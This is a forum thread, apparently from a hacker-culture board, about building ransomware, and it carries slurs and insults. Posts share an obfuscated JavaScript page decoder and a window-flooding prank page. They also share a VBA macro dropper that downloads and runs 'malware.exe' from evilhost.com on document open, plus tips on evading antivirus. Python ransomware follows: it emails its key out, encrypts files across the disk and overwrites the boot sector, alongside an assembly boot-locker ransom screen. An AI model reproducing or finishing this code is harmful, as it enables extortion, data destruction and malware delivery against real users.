
Let's talk crypto.

  1. #21
    Sophie Pedophile Tech Support
    Is this your ransomware, Sophie?

    http://money.cnn.com/2016/03/28/tech...hospital-hack/

    I wish. I lol'd when i read that though.

    It's basically harmless. Just a fork bomb.

    Yeah i remember from redfern, thanks but no thanks.
  2. #22
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Yeah i remember from redfern, thanks but no thanks.

    C'mon, now.
  3. #23
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Ten points to the person who knows how I encrypted it in such a way that any browser can still parse it.
  4. #24
    Lanny Bird of Courage
    spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
  5. #25
    -SpectraL coward [the spuriously bluish-lilac bushman]
    spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace

    The title says, "Let's talk crypto".
  6. #26
    Sophie Pedophile Tech Support
    spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace

    At this point i just think he does it for the attention.
  7. #27
    -SpectraL coward [the spuriously bluish-lilac bushman]
    At this point i just think he does it for the attention.

    And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?
  8. #28
    Sophie Pedophile Tech Support
    And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?

    That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.

    inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet
  9. #29
    -SpectraL coward [the spuriously bluish-lilac bushman]
    That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.

    inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet

    Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.
  10. #30
    Sophie Pedophile Tech Support
    Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.

    Kill yourself, i post more quality content in a week than you do in a year.
  11. #31
    aldra JIDF Controlled Opposition

    <html><head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <script language="JavaScript">
    <!--
    /**
     * Decodes the obfuscated page held in h[6..] and writes it into the document.
     *
     * Each encoded byte is either two uppercase hex digits or one literal
     * character looked up in t. It is XORed with the constant 44 and with the
     * next character of pw (cycled). A decoded CR (13) flushes the current line
     * through document.writeln, LF (10) is dropped, anything else is appended.
     *
     * Security note: pw and the table t ship in the same script as the encoded
     * data, so everything needed to recover the markup is delivered to every
     * visitor. This is obfuscation, not encryption or access control. The
     * decoded text goes through document.writeln, so the browser parses it as
     * live HTML/script.
     *
     * @returns {boolean} always true.
     */
    function ZOKLock()
    {
    // h[0..4]: banner comment, h[5]: two-hex-digit password check value,
    // h[6..]: the encoded page.
    var h=new Array
    (

    '<!--*******************************************',
    ' This page protected by Yomoma ZokLock ',
    ' Copyright (C) Yomoma Software Co. 2001-2002 ',
    ' http://www.disney.com/ ',
    '********************************************-->',

    //Page Begin
    '6B',
    't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
    '@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
    'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
    '*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
    'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
    '$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
    '39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
    '3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
    '&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
    'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
    'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
    '3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
    ',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
    '$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
    );
    //Page End

    // The decoding password is a literal in the script, so it is not a secret.
    var pw='default';
    // Lookup table used in both directions: t.indexOf(ch) gives a byte value,
    // t.charAt(n) gives the character for a decoded byte.
    // NOTE(review): looks like it is meant to be a 256-entry identity table for
    // an 8-bit charset; some entries may have been lost in this copy. Confirm.
    var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ';

    // Characters that start a two-digit hex escape in the encoded data.
    var x='0123456789ABCDEF';
    var i,j,xs;
    var c=0;

    // XOR the table indexes of all password characters into a one-byte check value.
    for(i=0;i<pw.length;i++)
    c=c^t.indexOf(pw.charAt(i));

    // Compare that value with the two hex digits in h[5]. The branch body is
    // empty, so a mismatch changes nothing in this copy.
    if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
    {
    }

    // Emit the five banner lines unchanged.
    for(i=0;i<5;i++)
    document.writeln(h[i]);

    // Emit 40 empty writeln() calls; presumably padding before the decoded
    // markup. The purpose is not stated in the script.
    for(i=0;i<40;i++)
    document.writeln();

    var n=pw.length;   // password length, used to wrap m
    var m=0;           // index of the next password character
    var s='';          // decoded line being built
    for(j=6;j<h.length;j++)
    {
    for(i=0;i<h[j].length;i++)
    {
    xs=h[j].charAt(i)
    if(x.indexOf(xs)>=0)
    {
    // A hex digit starts a two-character escape: consume the next character
    // too and read the pair as one byte.
    i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
    }
    else
    // Any other character stands for its own index in t.
    c=t.indexOf(xs);
    // Undo the encoding: XOR with the constant 44 and the current password character.
    c=c^44^t.indexOf(pw.charAt(m));
    m++;
    if(m==n)
    m=0;
    if(c==13)
    {
    // Carriage return: write out the finished line and start a new one.
    document.writeln(s);s='';
    }
    else if(c==10)
    {
    // Line feed: ignored, since the CR branch already ended the line.
    ;
    }
    else
    s=s+t.charAt(c);
    }
    }

    // Write whatever remains after the last CR.
    document.writeln(s);

    return true;
    }

    // Browser sniff on navigator.appName: when it contains 'Microsoft' the
    // decoder runs immediately, and ie is set so the onLoad handler skips it.
    var ie = navigator.appName.indexOf('Microsoft') >= 0 ? 1 : 0;
    if (ie == 1) {
      ZOKLock();
    }

    /**
     * Body onLoad handler: runs the decoder unless the top-level browser check
     * already ran it (ie set to a non-zero value).
     */
    function ZOKLock2() {
      if (ie != 0) {
        return;
      }
      ZOKLock();
    }
    // -->

    </script></head><body onLoad="ZOKLock2();"></body></html>



    <html>
    <head>
    <script language="JavaScript">
    <!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
    </script>
    <script LANGUAGE="JavaScript" SRC="prot.js"></script>
    <title>So Many Browsers So Little Time</title>
    </head>
    <body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
    <form method="POST">
    <p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
    </form>
    </body>
    <script language="JavaScript">
    <!-- window.open = SymRealWinOpen; //-->
    </script>
    </html>


  12. #32
    Sophie Pedophile Tech Support

    <html><head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <script language="JavaScript">
    <!--
    /**
     * Decodes the obfuscated page held in h[6..] and writes it into the document.
     *
     * Each encoded byte is either two uppercase hex digits or one literal
     * character looked up in t. It is XORed with the constant 44 and with the
     * next character of pw (cycled). A decoded CR (13) flushes the current line
     * through document.writeln, LF (10) is dropped, anything else is appended.
     *
     * Security note: pw and the table t ship in the same script as the encoded
     * data, so everything needed to recover the markup is delivered to every
     * visitor. This is obfuscation, not encryption or access control. The
     * decoded text goes through document.writeln, so the browser parses it as
     * live HTML/script.
     *
     * @returns {boolean} always true.
     */
    function ZOKLock()
    {
    // h[0..4]: banner comment, h[5]: two-hex-digit password check value,
    // h[6..]: the encoded page.
    var h=new Array
    (

    '<!--*******************************************',
    ' This page protected by Yomoma ZokLock ',
    ' Copyright (C) Yomoma Software Co. 2001-2002 ',
    ' http://www.disney.com/ ',
    '********************************************-->',

    //Page Begin
    '6B',
    't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
    '@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
    'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
    '*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
    'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
    '$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
    '39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
    '3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
    '&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
    'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
    'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
    '3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
    ',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
    '$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
    );
    //Page End

    // The decoding password is a literal in the script, so it is not a secret.
    var pw='default';
    // Lookup table used in both directions: t.indexOf(ch) gives a byte value,
    // t.charAt(n) gives the character for a decoded byte.
    // NOTE(review): looks like it is meant to be a 256-entry identity table for
    // an 8-bit charset; some entries may have been lost in this copy. Confirm.
    var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ';

    // Characters that start a two-digit hex escape in the encoded data.
    var x='0123456789ABCDEF';
    var i,j,xs;
    var c=0;

    // XOR the table indexes of all password characters into a one-byte check value.
    for(i=0;i<pw.length;i++)
    c=c^t.indexOf(pw.charAt(i));

    // Compare that value with the two hex digits in h[5]. The branch body is
    // empty, so a mismatch changes nothing in this copy.
    if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
    {
    }

    // Emit the five banner lines unchanged.
    for(i=0;i<5;i++)
    document.writeln(h[i]);

    // Emit 40 empty writeln() calls; presumably padding before the decoded
    // markup. The purpose is not stated in the script.
    for(i=0;i<40;i++)
    document.writeln();

    var n=pw.length;   // password length, used to wrap m
    var m=0;           // index of the next password character
    var s='';          // decoded line being built
    for(j=6;j<h.length;j++)
    {
    for(i=0;i<h[j].length;i++)
    {
    xs=h[j].charAt(i)
    if(x.indexOf(xs)>=0)
    {
    // A hex digit starts a two-character escape: consume the next character
    // too and read the pair as one byte.
    i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
    }
    else
    // Any other character stands for its own index in t.
    c=t.indexOf(xs);
    // Undo the encoding: XOR with the constant 44 and the current password character.
    c=c^44^t.indexOf(pw.charAt(m));
    m++;
    if(m==n)
    m=0;
    if(c==13)
    {
    // Carriage return: write out the finished line and start a new one.
    document.writeln(s);s='';
    }
    else if(c==10)
    {
    // Line feed: ignored, since the CR branch already ended the line.
    ;
    }
    else
    s=s+t.charAt(c);
    }
    }

    // Write whatever remains after the last CR.
    document.writeln(s);

    return true;
    }

    // Browser sniff on navigator.appName: when it contains 'Microsoft' the
    // decoder runs immediately, and ie is set so the onLoad handler skips it.
    var ie = navigator.appName.indexOf('Microsoft') >= 0 ? 1 : 0;
    if (ie == 1) {
      ZOKLock();
    }

    /**
     * Body onLoad handler: runs the decoder unless the top-level browser check
     * already ran it (ie set to a non-zero value).
     */
    function ZOKLock2() {
      if (ie != 0) {
        return;
      }
      ZOKLock();
    }
    // -->

    </script></head><body onLoad="ZOKLock2();"></body></html>



    <html>
    <head>
    <script language="JavaScript">
    <!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
    </script>
    <script LANGUAGE="JavaScript" SRC="prot.js"></script>
    <title>So Many Browsers So Little Time</title>
    </head>
    <body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
    <form method="POST">
    <p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
    </form>
    </body>
    <script language="JavaScript">
    <!-- window.open = SymRealWinOpen; //-->
    </script>
    </html>



    Of course you are free to post what you want. But seeing as i value your expertise and appreciate and respect your opinion in the infosec/programming field i was hoping you'd share your thoughts on crypto and ransomware in general. If you have anything interesting to add i'd love to hear about it. Just ignore spectral, he's just a skid trying to look cool.

    For delivery of the ransomware i had the folling in mind:

    A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;
    • Encrypt all strings present in your VBA code
    • Encrypt data from your python Script in VBA code (domain names or paths for example)
    • Randomize each functions' (or variables) names
    • Choose Encryption method, how and where encryption keys are stored
    • Generate as many unique MS Office documents as you want using a file name list and a document template
    • Enable autodestruction of encryption Keys feature once the VBA has been triggered once

    As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:


    Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
    [rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string


    Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.




    Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad

    Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.

    https://github.com/CloudStrief/xcode...doc/skript.txt


    Option Explicit

    Public CN As String
    Public APD As String
    Public UN As String
    Public HOSTNAME As String
    Public DROPPER_EXE As String
    Public PAYLOADS_FOLDER As String
    Public PAYLOAD_FILE As String

    Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
    End Function


    Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String

    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")

    oShell.Run APD + DROPPER_EXE
    FN = APD

    On Error GoTo 0
    End Sub

    Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
    End Sub

    Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE

    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"

    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
    End Function



    This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.

    https://github.com/CloudStrief/xcode
  13. #33
    -SpectraL coward [the spuriously bluish-lilac bushman]
    <!– function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //–>
    </script>

    You one smart cookie. Is your name really... Oddballz194... by any chance? Not many people can do what you just did thar.
  14. #34
    Ajax African Astronaut [rumor the placative aphakia]
    You one smart cookie. Is your name really… Oddballz194… by any chance? Not many people can do what you just did thar.

    You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that.
  15. #35
    -SpectraL coward [the spuriously bluish-lilac bushman]
    You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that.

    I'mma still gonna guess Oddballz_194. Call me crazy.

    If I had to take a second guess, I'd have to go with Fish.
  16. #36
    Sophie Pedophile Tech Support
    *Resurrects thread*

    Ahh, when this idea was still just that, an idea.


    import os
    import sys
    import random
    import struct
    import smtplib
    import string
    import datetime
    import time

    import getpass as gp

    from Crypto.Cipher import AES
    from Crypto.PublicKey import RSA
    from multiprocessing import Pool


    ID = ''
    key = RSA.generate(2048)
    exKey = RSA.exportKey('PEM')


    if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
    os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
    pass
    else:
    try:
    os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
    pass


    def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    global ID
    ID = ''.join(random.choice(chars) for _ in range(size))


    def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"
    PORT = 587
    USER= "address@gmail.com" # Specify Username Here
    PASS= "prettyflypassword" # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]
    SUBJECT = "Ransomware data: "+str(ts)
    MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
    message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:
    server = smtplib.SMTP()
    server.connect(SERVER, PORT)
    server.starttls()
    server.login(USER, PASS)
    server.sendmail(FROM, TO, message)
    server.quit()
    except Exception as e:
    # print e
    pass



    def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

    if not out_filename:
    out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
    with open(out_filename, 'wb') as outfile:
    outfile.write(struct.pack('<Q', filesize))
    outfile.write(iv)

    while True:
    chunk = infile.read(chunksize)
    if len(chunk) == 0:
    break
    elif len(chunk) % 16 != 0:
    chunk += ' ' * (16 - len(chunk) % 16)

    outfile.write(encryptor.encrypt(chunk))



    def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

    def selectfiles():

    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
    ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
    ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
    ".jpg",".jpeg",".png", ".tiff", ".zip", ".7z", ".exe",
    ".tar.gz", "tar", ".mp3", ".sh", ".c", ".h", ".txt"]

    files_to_enc = []
    for root, dirs, files in os.walk("/"):
    for file in files:
    if file.endswith(tuple(ext)):
    files_to_enc.push(os.path.join(root, file))

    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)


    def note():

    readme = """

    .d8888b. 888
    d88P Y88b 888
    888 888 888
    888 888 888 88888b. 88888b. .d88b. 888d888
    888 888 888 888 "88b 888 "88b d8P Y8b 888P"
    888 888 888 888 888 888 888 888 88888888 888
    Y88b d88P Y88b 888 888 d88P 888 888 Y8b. 888
    "Y8888P" "Y88888 88888P" 888 888 "Y8888 888
    888 888
    Y8b d88P 888
    "Y88P" 888



    Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible to retrieve
    without aquiring the encryption key and decrypting binary. As of yet these are not available to you since the Cypher ransomware is
    still under construction. We thank you for your patience.

    Have a nice day,

    The Cypher Project."""

    # Windows variant
    # outdir = os.getenv('USERNAME') + "\\Desktop"

    outdir = os.getenv('HOME') + "/Desktop/"
    outfile = outdir + "README"

    handler = open(outputfile, 'w')
    handler.write(outfile, ID)
    handler.close()

    if __name__=="__main__":
    gen_client_ID()
    send_ID_Key()

    try:
    selectfiles()
    note()
    except Exception as e:
    pass




    Bootlocker source in asm.


    [BITS 16]
    [ORG 0x7C00]
    MOV SI, Msg
    CALL OutStr
    JMP $
    OutChar:
    MOV AH, 0x0E
    MOV BH, 0x00
    MOV BL, 0x07
    INT 0x10
    RET
    OutStr:
    next_char:
    MOV AL, [SI]
    INC SI
    OR AL, AL
    JZ exit_function
    CALL OutChar
    JMP next_char
    exit_function:
    RET
    Msg db 0xA, 0xD, 0xA, 0xD
    db '########################################################', 0xA, 0xD
    db '# Your harddrive is encrypted with military grade #', 0xA, 0xD
    db '# encryption, you wont get your files back, since #', 0xA, 0xD
    db '# the Cypher ransomware is still under construction #', 0xA, 0xD
    db ' ', 0xA, 0xD
    db '########################################################', 0xA, 0xD, 0xA, 0xD
    db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
    db 'Have a nice day,', 0xA, 0xD
    db ' The Cypher Project', 0
    TIMES 510 - ($ - $$) db 0
    DW 0xAA55



    Compile ASM with NASM to boot.bin

    I think i did a pretty good job so far.
  17. #37
    Ghast Houston
    let us
  18. #38
    cryptographiccontrarian African Astronaut
    no you guys dont know shit all u gotta do is draw an ellipse and connect 2 pointz
  19. #39
    Migh Houston
    Originally posted by Ghast let us

    Oh shit, you bumped a six year old thread and made me regret not investing earlier.
  20. #40
    34nfi4w8g3wnfge4j93qrj309jg Houston [my metonymically tentacled thales]
    Originally posted by Migh Oh shit, you bumped a six year old thread and make me regret not investing earlier.

    It's okay , I did the same except for that recent crash remember that

    well I bought the top

    it happens

    its all about timing the market vs time in the market am I right fungazis